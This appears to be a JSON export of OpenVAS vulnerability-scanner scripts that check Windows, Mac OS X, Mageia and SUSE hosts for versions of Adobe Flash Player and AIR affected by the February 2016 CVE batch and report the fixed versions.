"title": "Adobe Flash Player Multiple Vulnerabilities -01 
Feb16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806865\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-10 
13:23:06 +0530 (Wed, 10 Feb 2016)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities -01 Feb16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities\n\n - Multiple use-after-free vulnerabilities\n\n - A heap buffer overflow vulnerability\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will\n potentially allow an attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 18.0.0.329 or 20.0.0.306 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_in_range(version:playerVer, test_version:\"19.0\", test_version2:\"20.0.0.305\"))\n{\n fix = \"20.0.0.306\";\n VULN = TRUE;\n}\n\nelse if(version_is_less(version:playerVer, test_version:\"18.0.0.329\"))\n{\n fix = \"18.0.0.329\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:playerVer, 
fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "Mageia Linux Local Security Checks mgasa-2016-0062", "modified": "2019-03-14T00:00:00", "published": "2016-02-11T00:00:00", "id": "OPENVAS:1361412562310131217", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131217", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0062.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131217\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-02-11 07:22:16 +0200 (Thu, 11 Feb 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0062\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.569 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system. This update resolves a type confusion vulnerability that could lead to code execution (CVE-2016-0985). This update resolves use-after-free vulnerabilities that could lead to code execution (CVE-2016-0973, CVE-2016-0974, CVE-2016-0975, CVE-2016-0982, CVE-2016-0983, CVE-2016-0984). This update resolves a heap buffer overflow vulnerability that could lead to code execution (CVE-2016-0971). 
This update resolves memory corruption vulnerabilities that could lead to code execution (CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, CVE-2016-0981).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0062.html\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0062\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.569~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-02-11T00:00:00", "id": "OPENVAS:1361412562310851202", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851202", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2016:0398-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851202\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-02-11 06:41:09 +0100 (Thu, 11 Feb 2016)\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:0398-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for flash-player fixes the following issues:\n\n - Security update to 11.2.202.569 (bsc#965901):\n\n * APSB16-04, CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967,\n CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0971,\n CVE-2016-0972, CVE-2016-0973, CVE-2016-0974, CVE-2016-0975,\n CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979,\n CVE-2016-0980, 
CVE-2016-0981, CVE-2016-0982, CVE-2016-0983,\n CVE-2016-0984, CVE-2016-0985\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0398-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.569~120.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.569~120.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T17:10:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-022.", "modified": "2020-05-14T00:00:00", "published": 
"2017-03-18T00:00:00", "id": "OPENVAS:1361412562310810658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810658", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3135782)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3135782)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810658\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 
value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 15:10:30 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3135782)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-022.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - A heap buffer overflow vulnerability.\n\n - A type confusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will potentially\n allow an attacker to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-022\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, test_version:\"20.0.0.306\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 20.0.0.306\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:24:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", 
"CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-12T00:00:00", "id": "OPENVAS:1361412562310806684", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806684", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities Feb16 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Air Multiple Vulnerabilities Feb16 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806684\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-12 17:36:12 +0530 (Fri, 12 Feb 2016)\");\n script_name(\"Adobe Air Multiple Vulnerabilities Feb16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The Multiple memory corruption errors.\n\n - The Multiple use-after-free errors.\n\n - A heap buffer overflow error.\n\n - A type confusion error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air 
version before 20.0.0.260 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 20.0.0.260 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"20.0.0.260\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"20.0.0.260\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0969", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0966", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-0977", "CVE-2016-0985"], "description": "This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.", "modified": "2019-10-23T00:00:00", "published": "2016-02-12T00:00:00", "id": "OPENVAS:13614125623108066845", "href": "http://plugins.openvas.org/nasl.php?oid=13614125623108066845", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities Feb16 (Mac OS X)", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Air Multiple Vulnerabilities Feb16 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.8066845\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\",\n \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\",\n \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\",\n \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\",\n \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\",\n \"CVE-2016-0984\", \"CVE-2016-0985\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-23 10:55:06 +0000 (Wed, 23 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-02-12 17:44:11 +0530 (Fri, 12 Feb 2016)\");\n 
script_name(\"Adobe Air Multiple Vulnerabilities Feb16 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - The multiple memory corruption errors.\n\n - The multiple use-after-free errors.\n\n - A heap buffer overflow error.\n\n - A type confusion error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code on the affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air version before 20.0.0.260 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 20.0.0.260 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-04.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"20.0.0.260\"))\n{\n report = report_fixed_ver(installed_version:airVer, fixed_version:\"20.0.0.260\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:11:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", 
